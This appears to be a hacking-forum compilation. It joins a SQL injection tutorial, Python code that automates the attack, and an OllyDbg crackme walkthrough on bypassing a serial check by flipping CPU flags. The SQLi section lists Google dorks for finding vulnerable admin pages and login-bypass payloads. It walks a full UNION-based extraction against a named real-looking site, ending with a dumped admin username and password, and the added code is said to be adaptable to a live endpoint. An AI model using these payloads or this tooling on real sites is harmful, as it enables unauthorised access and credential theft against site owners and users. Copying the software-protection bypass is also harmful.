ExPLOiTInc Bad News


Hello All,

Joe Root's old ExPLOiTInc Yahoo ID has been disabled by Yahoo.com

ExPLOiTInc@Yahoo.com <<=== Account closed by Yahoo.com

j0er00t_00x0@Yahoo.com <<=== New account, add me

Admin of Hack2World :- hack2wwworld.blogspot.com

Admin Of Hack2World :-hack2www.blogspot.com

Admin Of ExPLOiTInc :- Exploitinc.blogspot.com

MY SQL INJECTION COMPLETE TUTORIAL :)


Hello everyone.
I am going to share one of the best of my tutorials here.

Now let's begin!

SQL injection (SQLi, for Structured Query Language injection) is usually the first technique people learn for attacking websites. It is easy to do and a good starting point, but most SQLi tutorials are poor, which is why I am writing this one. SQLi is simply injecting your own SQL into the queries a web application sends to its database, either to read data the page was never meant to show or to bypass a login and get in as admin.

Things you should know:
Data lives in columns, columns live in tables, and tables live in a database.
Keep that in mind and the rest will make sense.

PART 1
Bypassing admin log in
Gaining auth bypass on an admin account.

Most of the sites vulnerable to this simple bypass are classic ASP applications that paste the login form fields straight into a SQL string.
First we need to find a site, so start by opening Google.
Now we type our dork (a "dork" is a search query that finds a particular kind of page or exploitable script).
There are a large number of Google dorks for basic SQL injection.
Here are the best:



Code:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now, what to do once we get to our site.
The login page should look something like this:
ADMIN USERNAME :
PASSWORD :

In the username field we always type "Admin" (the value hardly matters, because the injected condition is true for every row),
and in the password field we type our SQL injection.

Here is a list of SQL injection payloads:



Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1'='1

Pick the quote style (single, double, or none) that matches how the application quotes the field, and use the parenthesised variants when the query wraps the condition in brackets. The -- and # endings turn the rest of the query into a comment so whatever the application appends after your input is ignored; # only works on MySQL, and MySQL needs a space after -- for it to count as a comment.

So your input should look like this:

username: Admin
password: ' or '1'='1

The quote closes the password string and the or '1'='1 makes the WHERE clause true for every row, so the login query matches and the site lets you in as admin.

If the site is vulnerable, you are in.
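
As an added example, not part of the original post, here is the Part 1 bypass reproduced against a tiny SQLite database in Python, with the vulnerable string-built login query beside the parameterised version that defeats it. The tbladmin table and the ishir/ishir123 row come from Part 2 of this post; the query text, the function names and the use of SQLite instead of the ASP/MySQL back end are assumptions made for the demo. The mechanism is the same: AND binds tighter than OR, so the injected condition makes the WHERE clause true for every row.

```python
import sqlite3


def make_db():
    # Constructed sample data for the demo (not the post's real target).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tbladmin (username TEXT, password TEXT)")
    con.execute("INSERT INTO tbladmin VALUES ('ishir', 'ishir123')")
    return con


def build_login_query(username, password):
    # The vulnerable pattern: form fields pasted straight into the SQL text.
    # With password = ' or '1'='1 this becomes
    #   ... WHERE username='Admin' AND password='' or '1'='1'
    # and because AND binds tighter than OR, the clause is true for every row.
    return ("SELECT username FROM tbladmin WHERE username='%s' AND password='%s'"
            % (username, password))


def login_vulnerable(con, username, password):
    """Returns the matched username, or None when the login fails."""
    row = con.execute(build_login_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(con, username, password):
    """Same check with bound parameters: the quote in the payload is data, not SQL."""
    row = con.execute(
        "SELECT username FROM tbladmin WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    con = make_db()
    for payload in ("' or '1'='1", "' or 1=1--", "' or 'x'='x", "wrongpass"):
        print("%-16r vulnerable=%-8r safe=%r"
              % (payload, login_vulnerable(con, "Admin", payload),
                 login_safe(con, "Admin", payload)))
```

Run it and the first three payloads log in through login_vulnerable and fail through login_safe. SQLite accepts -- without a trailing space; on MySQL the ' or 1=1-- payload needs a space after the --.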

PART 2
Finding Sites to Inject

Finding SQLi-vulnerable sites is extremely easy; all you need to do is some googling. The first thing you need to do is find some dorks.
Download the SQLi dorks list from here : http://zyan.me/UVkJP

PS: I didn't put them in the thread because I passed the length limit...
Pick one of those dorks, add inurl: before it (if it does not already have it), then copy and paste it into Google. Pick one of the sites from the results and go to it.
For example the url of the page you are on may look like this :



Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10

To check whether it is vulnerable, all you have to do is add a single quote ' to the end of the parameter value.

So our link should look like this:

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=10'

Press enter. If the quote breaks the query you get some kind of database error; the exact message varies with the database and the application, but any SQL error here means the id value is placed into the query unescaped.

Our page should look like this:

[Image: vulnerrorcopy.jpg]

After you find your vulnerable site, the first step is to find the number of columns in the query. The easiest way is ORDER BY: add "order by " and a column number after the id value, followed by "--" to comment out the rest of the query. (MySQL only treats -- as a comment when a space follows it, and browsers trim trailing spaces from a URL, so if the plain -- does not work use --+ instead; the + becomes a space.) ORDER BY n errors when n is larger than the number of columns the query selects, so we try values until we find the largest one that works.
Our link should look like this:



Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15--

If you get an error, the query has fewer columns than that, so lower the number.
Let's try 10.



Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10--

The page opened normally, which means the number of columns is between 10 and 14.
We try 11 now.



Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11--

The page opened normally too...
Let's try 12.



Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12--

We got an error. That means the number of columns is 11, because 11 opened normally and 12 gave an error.

Finding Accessible Columns
Now that we have the number of columns, we need to find out which column positions are actually displayed on the page, because those are the ones we can read information through.
To do that we put a "-" before the "10" so that the original query matches no row and only our injected row is shown, and replace " order by # " with "union all select " followed by one number per column.
Our link should look like this:



Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11--

The page should now show numbers.

Our page should look like this:

[Image: vulncolumnscopy.jpg]

For the end part of the URL (1,2,3,4,5,6,7,8,9,10,11) you put the number of columns you found in the previous step. Since the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--
The numbers that actually appear on the page are the columns whose values the page displays, so those are the ones we can read data through. We will replace them later with something else, so write them down.

Getting Database Version
We found that columns 8, 3, 4 and 5 are displayed, so we will use one of them to get the database version.
Why do we do that?
On MySQL 5 and later the information_schema database lists every table and column, so we can read the names; if the version is below 5 we would have to guess the table names.
To get the version, replace one of the displayed columns with "@@version".
Let's take column 8.
Our link should look like this:



Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--

The page should look like this:

[Image: dbversioncopy.jpg]

In our case we got "5.0.77", which is version 5 or later, so we can continue.

Now we need the name of the table we want to access:
To do it, replace "@@version" with "table_name", add "from information_schema.tables" after the last column number, and keep the "--" at the end.
The link should look like this:



Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--

The page should look like this:

[Image: tablenamescopy.jpg]

Now look through the list for the table we want to access.
We look for something with admin in its name, and in our case it is tbladmin.

[Image: tblhcopy.jpg]

Now we need the ASCII codes of "tbladmin".
Why not just write 'tbladmin' in quotes? Many applications escape quote characters in the input (PHP's magic_quotes or addslashes), which would break the query, while char(...) builds the string from numbers and needs no quotes. (A hex literal such as 0x74626c61646d696e works the same way in MySQL.)
What is ASCII?
http://en.wikipedia.org/wiki/ASCII_value
To get the ASCII codes of "tbladmin", go to this site: http://getyourwebsitehere.com/jswb/text_to_ascii.html

[Image: acsii1copy.jpg]

Now enter the table name, "tbladmin" in our case, in the first box and click convert to ASCII.
You will get this value:



Code:
&#116;&#98;&#108;&#97;&#100;&#109;&#105;&#110;

Now remove the characters & # ; and put a comma "," between the numbers.
It should look like this:



Code:
116,98,108,97,100,109,105,110

[Image: acsii2copy.jpg]

Now in the URL we replace "table_name" with "column_name", change "information_schema.tables" to "information_schema.columns", and add "where table_name=char(ASCII codes)--" at the end.
In our case, in place of (ASCII codes) we put (116,98,108,97,100,109,105,110)--
Our URL should look like this:



Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--

Our page should look like this:

[Image: columnsmcopy.jpg]

Now we search the list for columns named "username" and "password" or something similar.
In our case they are "username" and "password".
Now we can delete most of the URL:
remove everything after the 11 and add "from tbladmin", and replace "column_name" with "concat(username,0x3a,password)".
0x3a is the hex code of ":", so the username and password come out separated by a colon.
Our URL should look like this:

 

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin

Our page should look like this:

[Image: adminandpass.jpg]

And you're done: the username is ishir and the password is ishir123.
Sometimes the password is stored as a hash rather than in clear text.
Use my hash detector to identify the hash type and look it up online.
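
As an added example, not from the original post, here is the whole Part 2 procedure (quote test, ORDER BY column counting, UNION with numbered placeholders, char() to avoid quote characters, and finally username:password extraction) written as Python functions driven against a stand-in for newsdetail.php backed by SQLite, with a parameter-bound version of the page for comparison. The tbladmin table, the ishir/ishir123 row and the char(116,...) literal follow the post; the news table, the rendering format and all function names are assumptions. SQLite has no information_schema, so the example reads sqlite_master instead and uses || in place of concat(); everything else is the same query shape the post builds by hand.

```python
import sqlite3


def make_db():
    # Constructed sample schema: the news table the vulnerable page reads, and
    # the admin table the tutorial ends up dumping. Not the post's real target.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT);
        INSERT INTO news VALUES (10, 'Lead acid basics', 'Some text', 'staff');
        CREATE TABLE tbladmin (username TEXT, password TEXT);
        INSERT INTO tbladmin VALUES ('ishir', 'ishir123');
    """)
    return con


def news_page(con, raw_id):
    """Stand-in for newsdetail.php?id=...: id is concatenated into the SQL unescaped.
    Renders the first row as 'a | b | c | d', or 'ERROR' where PHP would print a warning."""
    sql = "SELECT id, title, body, author FROM news WHERE id=" + raw_id
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.OperationalError:
        return "ERROR"
    return " | ".join(str(v) for v in row) if row else ""


def safe_news_page(con, raw_id):
    """Hardened version: the value is bound, so 'order by' or 'union' in it is never parsed as SQL."""
    row = con.execute("SELECT id, title, body, author FROM news WHERE id=?", (raw_id,)).fetchone()
    return " | ".join(str(v) for v in row) if row else ""


def find_column_count(page, base_id="10", limit=32):
    """ORDER BY probing: the largest n for which 'order by n' does not error."""
    count = 0
    for n in range(1, limit + 1):
        if page("%s order by %d--" % (base_id, n)) == "ERROR":
            break
        count = n
    return count


def find_reflected_columns(page, ncols, base_id="10"):
    """UNION with numbered placeholders. The negative id makes the real query match
    nothing, so the injected row is what gets rendered; the numbers that show up
    are the columns we can read data through."""
    placeholders = ",".join(str(i) for i in range(1, ncols + 1))
    shown = set(page("-%s union all select %s--" % (base_id, placeholders)).split(" | "))
    return [i for i in range(1, ncols + 1) if str(i) in shown]


def extract(page, ncols, column, expression, tail, base_id="10"):
    """Put an expression in a reflected column and read its value back from the page."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[column - 1] = expression
    out = page("-%s union all select %s %s--" % (base_id, ",".join(cols), tail))
    return out.split(" | ")[column - 1]


def char_literal(text):
    """char(116,98,...) as in the post: a string literal with no quote characters,
    useful when the application escapes quotes. Works in MySQL and SQLite."""
    return "char(%s)" % ",".join(str(ord(c)) for c in text)


def dump_admin(con):
    """The whole Part 2 chain against the sample database; returns 'user:pass'."""
    def page(raw):
        return news_page(con, raw)
    ncols = find_column_count(page)
    col = find_reflected_columns(page, ncols)[0]
    # SQLite keeps its catalogue in sqlite_master instead of information_schema;
    # group_concat gathers several rows into the single row this page renders.
    tables = extract(page, ncols, col, "group_concat(name)",
                     "from sqlite_master where type='table'")
    if "tbladmin" not in tables.split(","):
        raise RuntimeError("admin table not found in: " + tables)
    # The CREATE statement plays the role of information_schema.columns here.
    create_stmt = extract(page, ncols, col, "sql",
                          "from sqlite_master where name=" + char_literal("tbladmin"))
    if "username" not in create_stmt or "password" not in create_stmt:
        raise RuntimeError("unexpected columns: " + create_stmt)
    # SQLite concatenates with ||; MySQL would use concat(username,0x3a,password).
    return extract(page, ncols, col, "username || ':' || password", "from tbladmin")


if __name__ == "__main__":
    con = make_db()
    print("quote test:", news_page(con, "10'"))
    print("columns:", find_column_count(lambda r: news_page(con, r)))
    print("dump:", dump_admin(con))
    print("hardened page given 'order by':", repr(safe_news_page(con, "10 order by 5--")))
```

The probing functions only need the page callable, so the same code would drive a real endpoint by swapping news_page for a function that fetches the URL and returns the response body; group_concat is used because this page, like many, renders only one row.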


And We're Done !

Our First (Sort Of) Crack : Tutorial 5



Introduction

In this tutorial we will be finishing up some last minute Olly things as we review a crackme. Well, sort of a crackme. It’s really just the program we used before but changed to ask for a serial number and display either a good message if you get the serial right, or a bad message if you get it wrong. I chose to do it this way, as opposed to jumping into a completely different crackme, because I want you to be able to focus on the serial checking routine, and not get bogged down in all of the other superfluous code. Next tutorial we will be going over a real crackme (I promise).
In this tutorial, all you need is OllyDBG (either my version or the original), and a copy of my revised crackme, which, by the way, I am calling the “First Assembly Kracking Engine”, or F.A.K.E. It is included in the files download for this tut. (and yes, Gdogg, I know kracking does not start with a ‘K’ :)
You can download the files and PDF version of this tutorial on the tutorials page.
Let’s get started.
Olly Main Screen
If you load up the FAKE.exe in Olly, you will notice that the first page of code is the same as our last program we studied.
Deja Vu
Let’s run the app, as knowing how it works is vitally important:
Running the Crackme
Click on register and the following dialog appears:
Crackme
I entered a serial:
Serial Entered
Then, after clicking the Enter Serial I get the following very bad message:
Denied
DANG IT! And I tried so hard!!!!! :)
Now, I want to show you the first method every new reverse engineer learns in order to find the registration checking routine:

Searching For All Text Strings

Let me first say that many ‘seasoned’ reversers (read crackers) out there think that this method should be rarely used. This is because it is a very obvious method, and because of that, anyone trying to protect their program from reverse engineering will disable it. Face it, any program out there that has been packed, protected, encrypted, or changed because the author of the program is not a complete knucklehead will block the ‘search for strings’ method by encrypting the strings. THAT BEING SAID, I find that there are a lot of knucklehead authors out there, so don’t tell any ‘seasoned’ crackers out there, but it’s one of the first things I check. (ps. It’s also one of the first things the ‘seasoned’ crackers check too :)
Basically, this method involves asking Olly to search the memory space of your program, searching for anything that looks like an ASCII or Unicode text string. Usually, it will be immediately apparent whether this technique worked or not; there will either be a plethora of text strings, many of which look very juicy (like “Thank you for registering!!!”), or there will be very few text strings, many of which look like this: “F@7=”.
Knowing whether there are legitimate text strings in a binary can give you some valuable information itself, such as whether the binary has been packed or protected in some way, whether it’s perhaps a malicious binary (after all, having the string “Send all users’ passwords to www.badguys.com” wouldn’t be very responsible virus writing), and even whether the binary was written in a more rarely used language.
Let’s see how we do this. Right-click in the assembly window and choose “Search For”->”All Referenced Text Strings”:
Search for Strings
And Olly will search the program’s memory space and display the Text String Window:
Text Strings
Hmmm, this looks interesting:) Keep in mind that this list is REALLY short as this app is really tiny. Normally, there could be thousands of entries here. Anyway, do you notice what I notice:
The good message
Looks very promising. Let’s jump to the code there and see what we see: double click on the “That serial is correct!!!!!” line and Olly will disassemble that area for us in the disassembly window:
Jump to good message
It is now time for me to introduce the second rule in
R4ndom’s Essential Truths About Reversing Data:

#2 Most protection schemes can be overcome by changing a simple jump instruction to jump to ‘good’ code instead of ‘bad’ code.


What this means is that almost every time before a bad message is displayed, there is some sort of check (Are we registered? Was the entered reg code correct? Is the time trial over?…) and there will be a jump after this compare that will either jump to the good message or the bad message depending on the outcome of the compare.
Let’s look for ourselves…Starting at the good message “This serial is correct!!!!” at address 401222, start scrolling up the list, looking for jump statements, especially jump statements that have some sort of compare (or call) right before them. If it’s a call, you can probably guess that the compare is inside the call…In our example, the first jump is a JNZ at address 401220. I have added an arrow to show you where this jump will go if it is used:
First JNZ
Hmmm. Notice that it jumps right past the message we want and right to the message we don’t want :(BUT, notice that right above this JNZ instruction is a CMP instruction :) That means this is a potential point that determines whether Olly displays the message we want or don’t want. Let’s scroll up further:
Jumps over Good message
There is another CMP/JNZ pair at 401212, and finally, a last one at 401207. If you look closely you will see that all three jumps jump past our good message and jump to the bad one. Logically, this means that three things are checked, and if any of them are triggered, we will hit the bad message. But, what happens if we don’t jump on any of these three jumps? Well, you can see that we will “fall through” to the good message. So, what this really means is we have to keep those jumps from jumping so that the program will keep “falling through” until it reaches our good message :)
Let’s run the app to see what it does, but first I want to show you:

How To Place A Comment

Comments are very useful, especially when you start getting into very intricate code. Code is already pretty hard to read, but with comments, we can remind ourselves of very important information. Here’s what we’re gonna do; we’re gonna set a comment on each of the JNZ instructions to remind ourselves what needs to happen.
In order to place a comment, either double click on the line you want to place the comment in the last column (where Olly has placed the “This is the correct serial!!!!” as well as other comments) or you can simply highlight the line you wish to place a comment and hit the “;” key. So highlight address 40120A, hit the semi-colon key and type “We do NOT want to jump here!”. Now, do the same thing, with the same comment, at addresses 401215 and 401220. This will place a comment on each of the JNZ instruction:
Placing Comments
Now, let’s set a breakpoint at address 401201 (or somewhere near here as it’s before our jump instructions):
Place breakpoint
and let’s run the program. Click “Register” on the crackme, enter a serial, and hit “Enter Serial”. Olly will now pause at our breakpoint:
Place breakpoint
Now, the first thing we notice is the line we stopped on:
MOV EBX, DWORD PTR DS:[403078]
From our last tutorial, we now know how to view the memory contents at this memory location- right-click that instruction and choose “Follow in Dump”->”Memory Address”. We then see that location in Olly’s dump window:
Dump Window
Well, well, well. This just happens to be the serial number I entered. So, from this instruction, we now know that the first 4 bytes (since EBX is a 32-bit register) are loaded into EBX, which in this case are 31 32 31 32, which in ASCII is “1212″. Hit F8 and let’s check EBX:
Register Window
If you want to see the actual ASCII characters in EBX, you can double click on the EBX register and it will show you the data in a couple of different formats, one of which is ASCII:
View Register Window
*For later use, remember this is also a way to change the register ‘on the fly’ if you want to experiment with different values in different registers…
I guess even though you already know this from reading your assembly language book (I mean, come on! I even put one up in the tools section!!!), that I don’t need to go over this, but just for a refresher I will explain…

Little Endian Order

(or at least the least you need to know about it)
Processors store data in memory differently, depending on the architecture. There are two ways to order the bytes of a value in memory; one is called Big-Endian and the other Little-Endian. Intel uses Little-Endian, so we must get used to it or it will really screw us up. Here is an example: say you have the value 7E04F172 (a 4-byte, 32-bit number). Split into bytes you get 7E, 04, F1, 72. Now, one would think that when storing these bytes into memory (let’s say at location 1000) it would look like this:
1000::7E
1001::04
1002::F1
1003::72
as any rational minded person would. But since the developers at Intel are so much smarter than us mere mortals, they decided to store it in the much more logical way:
1000::72
1001::F1
1002::04
1003::7E
The first example above is Big-Endian, meaning the biggest end of the number is stored first in memory: 7E is the most significant byte, so it goes in the first location, the next byte in the second, and so on. The second (obviously much smarter) example is called Little-Endian, meaning the least significant byte (in this case byte #4, 72) is stored first, followed by the third, then the second, then the first.
The true genius of using Little-Endian as opposed to its bigger brother really shines when you start viewing memory side by side. In Big-Endian, the number 7E04F172 looks like this:
7E04F172
which is obviously very confusing. Thank god that, with the help of Little-Endian, that same number 7E04F172 looks far more logical as:
72F1047E
What, you say? That’s just plain stupid- obviously the Big-Endian way makes far more sense, but then again, you are not a demi-god developer at Intel, so you do not even possess the brain power to begin to understand why this is FAR SUPERIOR. Anyway, (most) sarcasm aside, what this means is that when you look at a 4-byte number, both on disk and in memory, you must reverse the order of its 4 bytes. This is made even worse by the fact that Olly SOMETIMES does this for you, as you can see in the next picture:
Endianness
That’s all I’m going to say about this for now, but for a while I will point out the Endianneses(es)ess to you.
Now, back to our register window:
View Register Window
You will notice that the hexadecimal value is shown in Little-Endian order (the bytes in memory are 31 32 31 32, but the register reads 32313231) and that the Char(acters) are backward, since my serial started with 1212, not 2121. Trust me, you will get used to this.
Let’s now move on to the next instruction:
CMP BL, 61
This is obviously a compare statement, comparing BL, which is the lowest byte of the EBX register (RTF(asm)M), with the value 61 (hex). We don’t really have a clue what this means (yet) so let’s step over it. Finally we arrive at the first of our JNZ instructions:
JNZ SHORT FAKE.401236
Which as we recall, since we can read our comments we made earlier, that we DO NOT want to make this jump. I will remind you that JNZ stands for Jump if Not Zero, so these two lines basically mean “if the contents of BL are not equal to 61h, jump to the bad message”. Well, we can clearly see in the EBX register that the far right byte (BL) is not 61h, but instead is 31h, so already we’re stuck and we’re going to take this jump that we so much did not want to :(
But wait! Olly is a ‘dynamic’ debugger so we should be able to dynamic that jump! Well, since you probably read an entire chapter on flags in your assembly language book, I am not going to go over:

CPU Flags

We briefly went over flags in an earlier tutorial, and I’m really not going to go into detail on them as I’m sure the index of your assembly book has an “F” section, but I will say that flags are the way the processor can know what the outcome of certain instructions are. There are a significant amount of instructions in the Intel library that affect flags, but the most important (at least for reversing) are “compare” instructions. Basically, the CPU performs a compare on two items, sets certain flags based on their relative properties (are they the same? is one bigger? is one negative?) and then performs jump statements based on these flags. This is all just a very fancy way of saying IF THEN statements. For example, in a high-level language you may have a line like this:
if( serialNumber == 3 )
    dontShowNag();
else
    showNag();
in pseudo-assembly, this same set of instructions would be something like this:

compare serialNumber with 3
   jump (if they are equal) to dontShowNag();
   jump to showNag();
and in real assembly may look like this:
MOV EAX, addressOfSerialNumber
CMP EAX, 3
JE addressOfDontShowNag
JMP addressOfShowNag
First, EAX is loaded with our serial number. Next it is compared with “3″. If it is equal to 3 we jump to dontShowNag(). If it is not equal to 3, we pass the JE (Jump if Equal) instruction and hit the JMP (JuMP) instruction, which automatically jumps to showNag(), regardless of any flags.
The important flags (for us) are the ZERO flag and the CARRY flag, shown as “Z” and “C” in Olly. Basically, by changing one of these two flags, we can prevent (or force) any jump in the program, as we’ll see right now:
Jumping
On the line we are paused at (the first JNZ) we can see that Olly is going to take this jump by noticing that the jump arrow is red. If we were not going to take the jump, this line would be grey. ***If you are not using my version of Olly, the arrows will not be there, in which case you can look between the disassembly window and the dump window and Olly will tell you whether the jump will be taken or not. In our case, it shows this:
Jump Is Taken
Now, we know Olly will take this jump unless we intercede, so let’s do that. Go over to the register window and look for the “Z” flag:
Zero Flag
Notice that it is a zero. CMP subtracts the two values and sets the zero flag only when the result is zero, so Z=0 means 61h and the contents of BL (31h) are not the same. We can now see why the Jump if Not Zero instruction will jump: the zero flag is not set, so the result was “not zero”. Now, double click on the zero next to the zero flag and it should change to a 1:
Change the zero flag
and now notice that the arrow is grey (and that Olly says the jump is NOT taken):
Jump is not taken
We have changed Olly’s flags, and at the same time, we have changed the programs behaviour :) Go ahead, big shot, and hit F8 (you’ve earned it) and we should not take the jump :O We are now entering what looks like the same code segment, except this time EBX is being loaded with the second character of our serial, and it is being compared with 62h instead of 61h:
Next compare
We know that the second digit of our serial is not 62h and now we know what to do- F8 until you get to the JNZ statement, double click the zero flag, and keep going !!! You’ll pass right past the JNZ statement. We are almost there! The last section compares the third digit of our serial with 63h. The third digit of our serial is 31h, so the jump would normally be taken. Go ahead, you know what to do. We will then land on address 401222, one statement past the third jump:
Past the last jump
Your heart should be pumping, because I think we both know what comes next. There are no more jumps between us and salvation, so either step over the next couple of instructions (if you like to draw out the suspense) or just run the app (if you’re like me and can’t stand suspense) and we have reached the pearly gates:
The Pearly Gates
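
As an added example, not from the tutorial or its author, here is a small Python model of the routine the walkthrough above steps through: the serial bytes loaded little-endian into EBX (the Little Endian section), the CMP BL, imm8 / JNZ pairs at 40120A, 401215 and 401220 comparing successive bytes with 61h, 62h and 63h, and the effect of forcing the zero flag to 1 at each JNZ the way you do by double-clicking Z in Olly. The addresses and constants come from the tutorial; the assumption that each check reads one byte further into the serial, and the flag model itself, are the emulator's own.

```python
import struct

# CMP/JNZ pairs the tutorial identifies: (address of the JNZ, immediate compared
# against BL). Assumption: each check looks one byte further into the serial.
CHECKS = [(0x40120A, 0x61), (0x401215, 0x62), (0x401220, 0x63)]
GOOD_MESSAGE = 0x401222   # reached only by falling through every JNZ


def load_dword_le(buf, offset=0):
    """MOV EBX, DWORD PTR [addr]: four bytes read little-endian into a 32-bit register.
    b'1212' in memory (31 32 31 32) becomes 0x32313231 in the register."""
    chunk = buf[offset:offset + 4].ljust(4, b"\0")
    return struct.unpack("<I", chunk)[0]


def bl(ebx):
    """BL is the low byte of EBX, which on x86 is the first byte in memory."""
    return ebx & 0xFF


def cmp_flags(a, b):
    """CMP a, b subtracts b from a: ZF is set when the result is zero, CF when an
    unsigned borrow happened. Only ZF matters to JNZ."""
    return {"ZF": int(((a - b) & 0xFF) == 0), "CF": int(a < b)}


def run_check(serial, patch_zf_at=()):
    """Emulate the routine. Returns (reached_good_message, trace); each trace entry
    is (jnz_addr, ebx, bl, expected, jump_taken). patch_zf_at holds the JNZ
    addresses at which the debugger forces ZF=1 before the jump is evaluated."""
    data = serial.encode("ascii")
    trace = []
    for offset, (jnz_addr, expected) in enumerate(CHECKS):
        ebx = load_dword_le(data, offset)
        flags = cmp_flags(bl(ebx), expected)
        if jnz_addr in patch_zf_at:
            flags["ZF"] = 1            # what double-clicking Z in Olly does
        taken = flags["ZF"] == 0       # JNZ: jump if the last result was not zero
        trace.append((jnz_addr, ebx, bl(ebx), expected, taken))
        if taken:
            return False, trace        # jumped over 401222 to the bad message
    return True, trace                 # fell through to the good message


def format_trace(trace):
    return "\n".join("JNZ %06X: EBX=%08X BL=%02X expected=%02X %s"
                     % (a, ebx, b, exp, "TAKEN" if t else "not taken")
                     for a, ebx, b, exp, t in trace)


if __name__ == "__main__":
    ok, trace = run_check("1212")
    print(format_trace(trace), "\n-> good message:", ok)
    ok, trace = run_check("1212", patch_zf_at={a for a, _ in CHECKS})
    print(format_trace(trace), "\n-> good message with ZF patched at every JNZ:", ok)
```

With "1212" the first compare already fails and the trace stops at 40120A, exactly where Olly paused; patching ZF at all three addresses walks the emulation through to the good message without changing a byte of the serial, which is why flipping the flag works as a quick test before you decide whether to patch the jumps for real.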

Homework

I know you weren’t expecting this, as this tutorial has already been so exciting, but I am going to end with two things. The first is another
R4ndom’s Essential Truths About Reversing Data:

#3 You will not learn reverse engineering by just reading tutorials. You MUST experiment on your own, and you must do a great deal of it.

and in light of this new rule, I am leaving you with some homework. Your mission, should you accept it, is to find out what the serial number is. This means, what is the input that you must enter into the serial box for none of the JNZs to jump? You know you have found it when, after entering the correct serial, you do not have to adjust the app in any way; it will simply show “That Serial is Correct!!!!!!!”
